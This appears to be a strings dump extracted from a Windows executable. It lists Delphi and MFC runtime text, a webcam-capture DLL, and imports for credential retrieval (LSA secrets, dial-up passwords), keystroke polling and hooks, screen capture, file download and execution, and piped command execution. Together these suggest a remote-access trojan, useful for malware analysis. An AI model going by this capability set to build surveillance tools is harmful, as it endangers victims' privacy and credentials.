FlatSB_GetScrollProp
FlatSB_SetScrollProp
FlatSB_EnableScrollBar
FlatSB_ShowScrollBar
FlatSB_GetScrollRange
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_SetScrollPos
FlatSB_SetScrollInfo
FlatSB_SetScrollRange
uxtheme.dll
OpenThemeData
CloseThemeData
DrawThemeBackground
DrawThemeText
GetThemeBackgroundContentRect
GetThemePartSize
GetThemeTextExtent
GetThemeTextMetrics
GetThemeBackgroundRegion
HitTestThemeBackground
DrawThemeEdge
DrawThemeIcon
IsThemePartDefined
IsThemeBackgroundPartiallyTransparent
GetThemeColor
GetThemeMetric
GetThemeString
GetThemeBool
GetThemeInt
GetThemeEnumValue
GetThemePosition
GetThemeFont
GetThemeRect
GetThemeMargins
GetThemeIntList
GetThemePropertyOrigin
SetWindowTheme
GetThemeFilename
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysBool
GetThemeSysSize
GetThemeSysFont
GetThemeSysString
GetThemeSysInt
IsThemeActive
IsAppThemed
GetWindowTheme
EnableThemeDialogTexture
IsThemeDialogTextureEnabled
GetThemeAppProperties
SetThemeAppProperties
GetCurrentThemeName
GetThemeDocumentationProperty
DrawThemeParentBackground
EnableTheming
HelpContextHIA
OnCloseHIA
Cancel
Abort
Retry
Ignore
NoToAll
YesToAll
commdlg_help
commdlg_FindReplace
WndProcPtr%.8X%.8X
IntervalHIA
ExtCtrls
ExtCtrls7
Anchors
BevelWidth
BorderStyleP:D
ColorP;D
Constraints
Ctl3D
UseDockManager
DockSiteh3D
DragKind|9D
DragMode
Enabled
Locked
ParentBiDiMode
ParentBackground
ParentColor
ParentCtl3D
ParentFont
PopupMenu
ShowHint8:D
TabOrder
TabStop
Visible8AD
OnCanResizeHIA
OnConstrainedResize4CD
OnDockDropd?D
OnDockOverHIA
OnDragDropp=D
OnEndDragHIA
OnEnterHIA
OnMouseUpHIA
OnResize`@D
OnStartDockX>D
Delphi Picture
Delphi Component
MAPI32.DLL
comctl32.dll
2001, 2002 Mike Lischke
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
MS_WINHELP
#32770
ActnList
ActnList
ActnList
Margin
Range
ThumbSize
Tracking
TCloseEvent
TCloseAction
TCloseQueryEvent
Boolean
TShortCutEvent
Boolean
Boolean
Forms
FormsU
Align
Anchors
AutoScroll
AutoSize
BorderWidthP:D
Color
TransparentColorValueP;D
Constraints
Ctl3D
DefaultMonitor
DragKind|9D
DragMode
Enabled
ObjectMenuItem
PrintScale
Scaled
ScreenSnap
VertScrollBar
WindowMenuHIA
OnActivate8AD
OnCanResizeHIA
OnConstrainedResize4CD
OnContextPopupHIA
OnCreateHIA
OnDblClickHIA
OnDestroyHIA
OnDockDropd?D
OnDragDropp=D
OnGetSiteInfoHIA
OnKeyDown4=D
OnMouseUp8BD
OnMouseWheelUpHIA
OnPaintHIA
OnShortCutHIA
OnShow`@D
Forms
THintInfo@
Forms
UhM*C
UhI/C
Shd4C
Sh|4C
ShD4C
PixelsPerInch
TextHeight
IgnoreFontProperty
Uh]9C
Uh]<C
Uh@<C
Uhd=C
UhG=C
Uhv@C
UhJHC
MDICLIENT
Uh4SC
Uh VC
UhcYC
UhQcC
UhTfC
UhZnC
UhLqC
Uh/qC
UhlpC
Uh[xC
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
layout text
TApplication
MAINICON
vcltest3.dll
RegisterAutomation
t<j@j
User32.dll
SetLayeredWindowAttributes
TaskbarCreated
ImgList
Bitmap
comctl32.dll
comctl32.dll
ImageList_WriteEx
TMenuChangeEvent
TMenuItem
Boolean
TMenuDrawItemEvent
TRect
Boolean
TAdvancedMenuDrawItemEvent
TRect
TOwnerDrawState
TMenuMeasureItemEvent
Integer
Action
Caption
SubMenuImages
Default
ImageIndex
RadioItem0IA
ShortCut
VisibleHIA
OnAdvancedDrawItem
AutoLineReduction
AutoMerge
Images
OwnerDraw
TPopupMenu
AutoLineReduction
AutoPopup
MenuAnimation
OwnerDraw
OnChangeHIA
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
ShortCutText
Uh,!D
Uh"+D
Uhe,D
Uh@,D
Uh#,D
Shp'D
,E,,G
TDragObject\4D
TDragObject(4D
Controls
Controls
Controls
Controls
TSizeConstraints(;D
TMouseEvent
TObject
TMouseButton
TShiftState
Integer
Integer
TMouseMoveEvent
TObject
TShiftState
Integer
Integer
TKeyEvent
TShiftState
TKeyPressEvent
TDragOverEvent
TObject
Integer
Integer
Boolean
TDragDropEvent
TObject
Integer
Integer
TStartDragEvent
TDragObject
TEndDragEvent
TObject
Integer
Integer
TDockDropEvent
TDragDockObject
Integer
Integer
TDockOverEvent
TDragDockObject
Integer
Integer
Boolean
TUnDockEvent
Boolean
TStartDockEvent
TDragDockObject
TGetSiteInfoEvent
Boolean
TCanResizeEvent
Boolean
TConstrainedResizeEvent
Integer
TMouseWheelEvent
TObject
TShiftState
Boolean
TMouseWheelUpDownEvent
TObject
Boolean
TContextPopupEvent
Boolean
Heighth3D
Controls
TCustomControllMD
Controls
Controls
crDefault
crArrow
crCross
crIBeam
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crUpArrow
crHourGlass
crDrag
crNoDrop
crHSplit
crVSplit
crMultiDrag
crSQLWait
crAppStart
crHelp
crHandPoint
crSizeAll
crSize
UhZYD
Ph0]D
Uh|lD
UhDnD
UhUrD
%s (%s)
Uh'}D
IsControl
DesignSize
,;=pKG
t&j7j
FLVhP'E
Uhs$E
Uh/%E
Uhu&E
Uh$&E
USER32
WINNLSEnableIME
imm32.dll
ImmGetContext
ImmReleaseContext
ImmGetConversionStatus
ImmSetConversionStatus
ImmSetOpenStatus
ImmSetCompositionWindow
ImmSetCompositionFontA
ImmGetCompositionStringA
ImmIsIME
ImmNotifyIME
Delphi%.8X
ControlOfs%.8X%.8X
USER32
AnimateWindow
Uh":E
Uh'CE
UhqFE
Uh`FE
UhCFE
Uh^LE
Uh/LE
UhBOE
L$$Qj
D$$Pj
D$ 46G
Uh7nF
UhMoF
UhMpF
Apartment
Neutral
Uh^sF
ole32.dll
CoCreateInstanceEx
CoInitializeEx
CoAddRefServerProcess
CoReleaseServerProcess
CoResumeClassObjects
CoSuspendClassObjects
UhKyF
Uh(yF
_AMMediaTypeH
IMediaFilter0FA
DirectShow9'
DSUtil
DSUtil
DSUtil
FilterGraph %p pid %x
E:\DelphiComponment\DSPACK234\src\DSPack\DSUtil.pas
Assertion failure
($%x).
PhD8G
TOnDSEvent
TComponent
Integer
Integer
Integer
TOnGraphBufferingData
TObject
Boolean
TOnGraphComplete
TObject
IBaseFilter
TOnGraphDeviceLost
IInterface
Boolean
TOnGraphEndOfSegment
TObject
Int64
Cardinal
TOnDSResult
TObject
HRESULT
TOnGraphFullscreenLost
IBaseFilter
TOnGraphOleEvent
TObject
WideString
WideString
TOnGraphOpeningFile
TObject
Boolean
TOnGraphSNDDevError
TObject
_tagSND_DEVICE_ERROR
Cardinal
TOnGraphStreamControl
Cardinal
TOnGraphStreamError
TObject
HRESULT
Cardinal
TOnGraphVideoSizeChanged
TObject
TOnGraphTimeCodeAvailable
IBaseFilter
Cardinal
TOnGraphEXTDeviceModeChange
TObject
Cardinal
Cardinal
TOnGraphVMRRenderDevice
TObject
Integer
TOnDVDAudioStreamChange
TObject
Integer
Integer
String
TOnDVDCurrentTime
TObject
Integer
Integer
Integer
Integer
Integer
TOnDVDTitleChange
TObject
Integer
TOnDVDChapterStart
TObject
Integer
TOnDVDValidUOPSChange
TObject
Integer
TOnDVDChange
TObject
Integer
Integer
TOnDVDStillOn
TObject
Boolean
Integer
TOnDVDSubpictureStreamChange
TObject
Integer
Integer
String
TOnDVDPlaybackRateChange
TObject
Single
TOnDVDParentalLevelChange
TObject
Integer
TOnDVDAnglesAvailable
TObject
Boolean
TOnDVDButtonAutoActivated
TObject
Cardinal
TOnDVDCMD
TObject
Cardinal
TOnDVDCurrentHMSFTime
TObject
tagDVD_TIMECODE
TOnDVDKaraokeMode
TObject
Boolean
TOnBuffer
TObject
Double
Pointer
Integer
IMoniker
Boolean
Boolean
Boolean
DSPackQ
LogFile
Active
GraphEdit
LinearVolumeHIA
OnGraphBufferingDataHIA
OnGraphFullscreenLostHIA
OnGraphOpeningFileHIA
OnGraphPausedHIA
OnGraphSNDDevOutErrorHIA
OnGraphStreamErrorStoppedHIA
OnGraphEXTDeviceModeChangeHIA
OnDVDButtonChangeHIA
OnDVDStillOnHIA
OnDVDSubpictureStreamChangeHIA
OnDVDParentalLevelChangeHIA
OnDVDAnglesAvailableHIA
OnDVDCMDEndHIA
OnDVDDiscEjectedHIA
OnDVDKaraokeModeHIA
OnDVDDomainFirstPlayHIA
OnDVDDomainVideoManagerMenuHIA
OnDVDDomainVideoTitleSetMenuHIA
OnDVDDomainTitleHIA
OnDVDDomainStopHIA
OnDVDErrorUnexpectedHIA
OnDVDErrorCopyProtectFailHIA
OnDVDErrorInvalidDVD1_0DiscHIA
OnDVDErrorInvalidDiscRegionHIA
OnDVDErrorLowParentalLevelHIA
OnDVDErrorMacrovisionFailHIA
-OnDVDErrorIncompatibleSystemAndDecoderRegionsHIA
+OnDVDErrorIncompatibleDiscAndDecoderRegionsHIA
OnDVDWarningInvalidDVD1_0DiscHIA
OnDVDWarningFormatNotSupportedHIA
OnDVDWarningIllegalNavCommandHIA
OnDVDWarningOpenHIA
OnDVDWarningSeekHIA
Preferences
OnPaint
VMROptions
Color
Visible
Align
TabStopHIA
OnEnterHIA
OnKeyDown4=D
OnKeyUp8AD
OnCanResizeHIA
OnConstrainedResizeHIA
OnMouseUp8BD
OnMouseWheelUpHIA
Phh8G
PhX8G
PhX8G
PhX8G
Allocator class not set.
Error Creating Allocator
VideoRenderer
E:\DelphiComponment\DSPACK234\src\DSPack\DSPack.pas
The SampleGrabber Filter is not available on this system.
?vids
Error
Runtime error at 00000000
MS Sans Serif
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
lstrcpyA
WriteFile
WaitForSingleObject
VirtualQuery
VirtualAlloc
Sleep
SizeofResource
SetThreadLocale
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
MultiByteToWideChar
MulDiv
LockResource
LoadResource
LoadLibraryA
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalFindAtomA
GlobalDeleteAtom
GlobalAlloc
GlobalAddAtomA
GetVersionExA
GetVersion
GetTickCount
GetThreadLocale
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentProcessId
GetCPInfo
GetACP
FreeResource
InterlockedExchange
FreeLibrary
FormatMessageA
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteFileA
DeleteCriticalSection
CreateThread
CreateFileA
CreateEventA
CompareStringA
CloseHandle
version.dll
VerQueryValueA
GetFileVersionInfoSizeA
GetFileVersionInfoA
gdi32.dll
UnrealizeObject
StretchBlt
SetWindowOrgEx
SetWinMetaFileBits
SetViewportOrgEx
SetTextColor
SetStretchBltMode
SetROP2
SetPixel
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
SaveDC
RestoreDC
RectVisible
RealizePalette
Polyline
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
LineTo
IntersectClipRect
GetWindowOrgEx
GetWinMetaFileBits
GetTextMetricsA
GetTextExtentPoint32A
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetDCOrgEx
GetCurrentPositionEx
GetClipBox
GetBrushOrgEx
GetBitmapBits
GdiFlush
ExcludeClipRect
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreateSolidBrush
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
CreateWindowExA
WindowFromPoint
WinHelpA
WaitMessage
UpdateWindow
UnregisterClassA
UnhookWindowsHookEx
TranslateMessage
TranslateMDISysAccel
TrackPopupMenu
SystemParametersInfoA
ShowWindow
ShowScrollBar
ShowOwnedPopups
ShowCursor
SetWindowsHookExA
SetWindowPos
SetWindowPlacement
SetWindowLongA
SetTimer
SetScrollRange
SetScrollPos
SetScrollInfo
SetRect
SetPropA
SetParent
SetMenuItemInfoA
SetMenu
SetForegroundWindow
SetFocus
SetCursor
SetClassLongA
SetCapture
SetActiveWindow
SendMessageA
ScrollWindow
ScreenToClient
RemovePropA
RemoveMenu
ReleaseDC
ReleaseCapture
RegisterWindowMessageA
RegisterClipboardFormatA
RegisterClassA
RedrawWindow
PtInRect
PostQuitMessage
PostMessageA
PeekMessageA
OffsetRect
OemToCharA
MessageBoxA
MapWindowPoints
MapVirtualKeyA
LoadStringA
LoadKeyboardLayoutA
LoadIconA
LoadCursorA
LoadBitmapA
KillTimer
IsZoomed
IsWindowVisible
IsWindowEnabled
IsWindow
IsRectEmpty
IsIconic
IsDialogMessageA
IsChild
InvalidateRect
IntersectRect
InsertMenuItemA
InsertMenuA
InflateRect
GetWindowThreadProcessId
GetWindowTextA
GetWindowRect
GetWindowPlacement
GetWindowLongA
GetWindowDC
GetTopWindow
GetSystemMetrics
GetSystemMenu
GetSysColorBrush
GetSysColor
GetSubMenu
GetScrollRange
GetScrollPos
GetScrollInfo
GetPropA
GetParent
GetWindow
GetMenuStringA
GetMenuState
GetMenuItemInfoA
GetMenuItemID
GetMenuItemCount
GetMenu
GetLastActivePopup
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetIconInfo
GetForegroundWindow
GetFocus
GetDesktopWindow
GetDCEx
GetDC
GetCursorPos
GetCursor
GetClipboardData
GetClientRect
GetClassNameA
GetClassInfoA
GetCapture
GetActiveWindow
FrameRect
FindWindowExA
FindWindowA
FillRect
EqualRect
EnumWindows
EnumThreadWindows
EndPaint
EnableWindow
EnableScrollBar
EnableMenuItem
DrawTextA
DrawMenuBar
DrawIconEx
DrawIcon
DrawFrameControl
DrawEdge
DispatchMessageA
DestroyWindow
DestroyMenu
DestroyIcon
DestroyCursor
DeleteMenu
DefWindowProcA
DefMDIChildProcA
DefFrameProcA
CreatePopupMenu
CreateMenu
CreateIcon
ClientToScreen
CheckMenuItem
CallWindowProcA
CallNextHookEx
BeginPaint
CharNextA
CharLowerBuffA
CharLowerA
CharToOemA
AdjustWindowRectEx
ActivateKeyboardLayout
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
ole32.dll
OleSaveToStream
OleLoadFromStream
GetRunningObjectTable
CreateItemMoniker
CoTaskMemFree
CoTaskMemAlloc
CLSIDFromString
CoCreateInstance
CoUninitialize
CoInitialize
IsEqualGUID
oleaut32.dll
GetErrorInfo
SysFreeString
comctl32.dll
ImageList_SetIconSize
ImageList_GetIconSize
ImageList_Write
ImageList_Read
ImageList_GetDragImage
ImageList_DragShowNolock
ImageList_SetDragCursorImage
ImageList_DragMove
ImageList_DragLeave
ImageList_DragEnter
ImageList_EndDrag
ImageList_BeginDrag
ImageList_Remove
ImageList_DrawEx
ImageList_Draw
ImageList_GetBkColor
ImageList_SetBkColor
ImageList_ReplaceIcon
ImageList_Add
ImageList_GetImageCount
ImageList_Destroy
ImageList_Create
avifil32.dll
AVIStreamRelease
AVIFileExit
AVIFileInit
AVIFileRelease
AVIStreamWrite
AVIStreamSetFormat
AVIMakeCompressedStream
AVIFileOpen
AVIFileCreateStream
winmm.dll
mmioStringToFOURCCA
quartz.dll
AMGetErrorTextA
VedioCapture.dll
CloseCamera
CreateVideoByFiles
GetCameraList
RecordVideo
SaveBmp
SetCameraID
StartCamera
StopRecord
8::C:J;S;
? ?$?0?P?X?\?`?d?h?l?p?t?x?
;!<(<?<&>:>R>Y>'?H?W?n?
>7?>?U?
= =C=
=,=@=E=
>P?w?
=$?u?
?P?n?
=X>\>`>d>h>l>p>
=+=1=
>$?.?@?V?
?8?=?H?O?_?l?
= =$=
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33333
333333333333333333
33333333?333333
33?33
33833
333333333333333333
33833
338?3
C33333833?33
3334JC33333338?333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333
333333333333333333
333333333333333333
33333
33333
3333333:3333333383
333333333333333333
33333333
vfff`
pfffffff
fffff`
VedioCapture
Rjpeg
JConsts
System
SysInit
KWindows
UTypes
SysUtils
SysConst
^Classes
"RTLConsts
3Messages
CVariants
$VarUtils
QTypInfo
sActiveX
+Graphics
Consts
oDSPack
FComObj
qComConst
Forms
Printers
WWinSpool
CommCtrl
FlatSB
StdActns
Clipbrd
YStrUtils
*ShellAPI
&Controls
5Themes
nComCtrls
ComStrs
ExtActns
0Mapi
EActnList
vMenus
Contnrs
ImgList
dStdCtrls
Dialogs
ExtCtrls
IDlgs
3CommDlg
(ShlObj
RegStr
?WinInet
UrlMon
ExtDlgs
Buttons
8Registry
IniFiles
CUxTheme
SyncObjs
RichEdit
ToolWin
ListActns
MultiMon
WinHelpViewer
RHelpIntfs
ADirectShow9
DirectDraw
DirectSound
GMMSystem
DXTypes
yDirect3D9
DSUtil
Camera
ZBmpsToAvi
AviCompress
\VedioCapture.dll
swfurl.txt
<input type="text" name="field_1new" size="25" value="" disabled class="txt" />" class="txt" />
3A3E2C90E571C7C7939604CF3924FFFC
NTDLL
0123456789ABCDEF
E.WinInet 1.0
Shell_TrayWnd
wininet.dll
kernel32.dll
avicap32.dll
rasapi32.dll
kernel32
ADVAPI32.DLL
advapi32.dll
ntdll.dll
user32
gdi32.dll
urlmon
user32.dll
atl.dll
gdiplus.dll
Ole32.dll
ole32.dll
ole32
psapi.dll
Advapi32.dll
upaxa.dll
shlwapi.dll
InternetOpenA
InternetCloseHandle
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
InternetReadFile
HttpQueryInfoA
MultiByteToWideChar
WideCharToMultiByte
GetVersion
capGetDriverDescriptionA
GlobalSize
RasEnumEntriesA
SHGetSpecialFolderPathA
RtlMoveMemory
RasGetEntryDialParamsA
RasGetEntryPropertiesA
GetPrivateProfileIntA
LsaFreeMemory
GetUserNameA
LookupAccountNameA
IsValidSid
ConvertSidToStringSidW
lstrlenW
lstrcpyn
LsaOpenPolicy
LsaRetrievePrivateData
LsaClose
CreateToolhelp32Snapshot
Process32First
CloseHandle
Process32Next
OpenProcess
VirtualQueryEx
ReadProcessMemory
RtlAnsiStringToUnicodeString
RtlFreeUnicodeString
RtlUnicodeStringToAnsiString
CallWindowProcA
GetCurrentProcess
SetProcessWorkingSetSize
GetLogicalDriveStringsA
GetDriveTypeA
GetDC
StretchBlt
GetDesktopWindow
ReleaseDC
SendMessageA
URLDownloadToFileA
EnumDisplaySettingsA
ChangeDisplaySettingsA
PeekMessageA
TranslateMessage
DispatchMessageA
ShellExecuteA
AtlAxWinInit
CreateWindowExA
AtlAxGetControl
CreateWaitableTimerA
SetWaitableTimer
MsgWaitForMultipleObjects
CreatePipe
CreateProcessA
PeekNamedPipe
ReadFile
GetExitCodeProcess
ShowCursor
ExitWindowsEx
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
MessageBoxA
MessageBoxTimeoutA
SwapMouseButton
GetModuleHandleA
SetWindowsHookExA
CallNextHookEx
SystemParametersInfoA
GetWindowsDirectoryA
GetSystemDirectoryA
GetTempPathA
GdiplusStartup
GlobalAlloc
CreateStreamOnHGlobal
GlobalLock
GlobalUnlock
GdipCreateBitmapFromStream
GdipCreateHBITMAPFromBitmap
GdipCreateBitmapFromHBITMAP
GdipSaveImageToStream
GetHGlobalFromStream
GlobalFree
GdipDisposeImage
GdiplusShutdown
CLSIDFromString
EnumWindows
GetWindowTextA
GetWindowTextLengthA
RtlFillMemory
GetClassNameA
GetWindowThreadProcessId
EnumProcessModules
GetProcessMemoryInfo
GetModuleBaseNameA
GetModuleFileNameExA
ZwOpenProcess
ZwQuerySystemInformation
ZwDuplicateObject
ZwQueryInformationProcess
ZwClose
IsZoomed
IsIconic
IsWindowEnabled
IsWindowVisible
PostMessageA
SetWindowTextA
CloseWindow
EnableWindow
ShowWindow
EnumChildWindows
GetVersionExA
OpenSCManagerA
EnumServicesStatusA
CloseServiceHandle
GetProcessHeap
HeapAlloc
HeapFree
EnumServicesStatusExA
OpenServiceA
ControlService
StartServiceA
lstrlenA
GetWindowLongA
SetWindowLongA
SetLayeredWindowAttributes
OpenFileMappingA
MapViewOfFile
SetCameraID
StartCamera
start
UnhookWindowsHookEx
SaveBmp
CloseCamera
GetForegroundWindow
CreateFontIndirectA
SelectObject
SetBkMode
SetTextColor
TextOutA
DeleteObject
CreateMutexA
WaitForSingleObject
ReleaseMutex
PathFindFileNameA
PathFindExtensionA
CreateThread
GetProcAddress
GetCurrentThread
CryptAcquireContextA
CryptCreateHash
CryptReleaseContext
CryptHashData
CryptDestroyHash
CryptGetHashParam
IsWindow
GetTickCount
UpdateWindow
GetWindowRect
MoveWindow
FindWindowA
GetCurrentProcessId
GetKeyState
InternetOpenUrlA
HttpAddRequestHeadersA
GetAsyncKeyState
wwwwwp
wwwwwp
wwwwwp
TF<<FEFF
}}}||Z|Z=
P}}}|ZZZZZ=
P||ZZZZwTw=
PTZwSwJTJJ=
TTSJPJJJJJ=
PJJJJJJFJ==
`PFJFFF=====
L^TFF======9=
rja\[+]nnjb*N<<=<<<222=
T<<99222/2=
N9-9---/,,=
F2----/,,,=
N---//!###=
|K<<<<<<<<D<D<KwT<-#<
FD<D2D2;;;D9DSTS
xxxxxxp
nnnnP
nnnnnnnnnP
nnnnnnnnjjjjP
^nnnnnnjjjjjj^P
Ynjj^^j^j^]]]YP
Yn^^^^^Y^]]]]]P
Y^^^YYY]]]PPPPP
YYYW^YY]PPP]PPP
VYYW]P]PP]PPPPP
VVVPPPPPPPBPBPP
PPPPPHPBBPBPBBP
PPPBPBPBPBBBBBP
PEEEBEBBBBBBB3P
P>EBBBBBB<B3B3P
H>B>>B>>><B333P
P>>>>>>>>33333P
>>>>><1<333333P
H<1<11<1111&3&P
>111111111&1((P
>111111(((((((P
>11((((((&((#(P
>(((($$$$$$&##P
nP>>($$($$$$###P
gWPPPPEPPWYP>1$$#####P
nPPPEPEVEPEEPEVEVEPVYY>>$###P
^EVEVNNVEVEVNNNVEVVPVV^nH>1P
^NNNNVENNNNVENNEVEPP^nY
;Z,;G
ew(;K
6*vW\
W}jSD
W}jSA
imSun
imSun
imSun
>bKGD
0123456789ABCDEF
123456789
0123456789ABCDEF
""""UUUU
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
>IHDR
0123456789ABCDEF
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
TIFFOpen
TIFFWriteScanline
TIFFWriteEncodedStrip
TIFFWriteRawStrip
TIFFWriteEncodedTile
TIFFWriteRawTile
TIFFWriteBufferSetup
TIFFAppendToStrip
TIFFAdvanceDirectory
TIFFUnlinkDirectory
PhotometricInterpretation
TIFFClientOpen
TIFFReadRawStrip
TIFFFillStrip
TIFFReadRawTile
TIFFFillTile
TIFFReadBufferSetup
to fetch tag value
for "ReferenceBlackWhite" array
@TIFFRewriteDirectory
TIFFLinkDirectory
LogL16InitState
LogLuvInitState
TIFFInitSGILog
Fax3Decode1D
Fax3Decode2D
Fax4Decode
Fax3DecodeRLE
JPEGPreDecode
JPEGSetupEncode
JPEGPreEncode
LZWSetupDecode
%*.*f
CNotSupportedException
CMemoryException
CException
CFile
CMemFile
CTempGdiObject
CTempDC
CPalette
CBitmap
CFont
CBrush
CGdiObject
CPaintDC
CWindowDC
CClientDC
CUserException
CResourceException
CDialog
MS Sans Serif
MS Shell Dlg
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
InitCommonControlsEx
COMCTL32.DLL
CPtrArray
CEdit
CComboBox
CButton
CStatic
CFileDialog
CStringArray
CWinApp
PreviewPages
Settings
CTempImageList
CImageList
CProgressCtrl
CSpinButtonCtrl
CArchiveException
CSharedFile
CCmdTarget
CWinThread
CTempMenu
CMenu
combobox
CDWordArray
CWordArray
CFileException
CMapPtrToPtr
CToolTipCtrl
tooltips_class32
CColorDialog
CObject
COleDispatchException
CByteArray
UNLINK
DELETE
COleException
System
commdlg_SetRGBColor
commdlg_help
commdlg_ColorOK
commdlg_FileNameOK
commdlg_ShareViolation
commdlg_LBSelChangedNotify
CPtrList
software
CSyncObject
CCriticalSection
CMapStringToPtr
RichEdit Text and Objects
Rich Text Format
FileNameW
FileName
Link Source Descriptor
Object Descriptor
Link Source
Embed Source
Embedded Object
ObjectLink
OwnerLink
Native
COleBusyDialog
COleDialog
%2\CLSID
%2\Insertable
%2\protocol\StdFileEditing\verb\0
&Edit
%2\protocol\StdFileEditing\server
CLSID\%1
CLSID\%1\ProgID
CLSID\%1\InprocHandler32
ole32.dll
CLSID\%1\LocalServer32
CLSID\%1\Verb\0
&Edit,0,2
CLSID\%1\Verb\1
&Open,0,2
CLSID\%1\Insertable
CLSID\%1\AuxUserType\2
CLSID\%1\AuxUserType\3
CLSID\%1\DefaultIcon
%3,%7
CLSID\%1\MiscStatus
CLSID\%1\InProcServer32
CLSID\%1\DocObject
%2\DocObject
CLSID\%1\Printable
CLSID\%1\DefaultExtension
%9, %8
Unknown exception
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
am/pm
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
Microsoft Visual C++ Runtime Library
Program:
<program name unknown>
GAIsProcessorFeaturePresent
KERNEL32
e+000
frexp
_hypot
_cabs
ldexp
floor
atan2
log10
`h````
(null)
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
Paraguay
Uruguay
Chile
Ecuador
Argentina
Colombia
Venezuela
Dominican Republic
South Africa
Panama
Luxembourg
Costa Rica
Switzerland
Guatemala
Canada
Spanish - Modern Sort
Australia
English
Austria
German
Belgium
Mexico
Spanish
Basque
Sweden
Swedish
Iceland
Icelandic
France
French
Finland
Finnish
Spain
Spanish - Traditional Sort
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
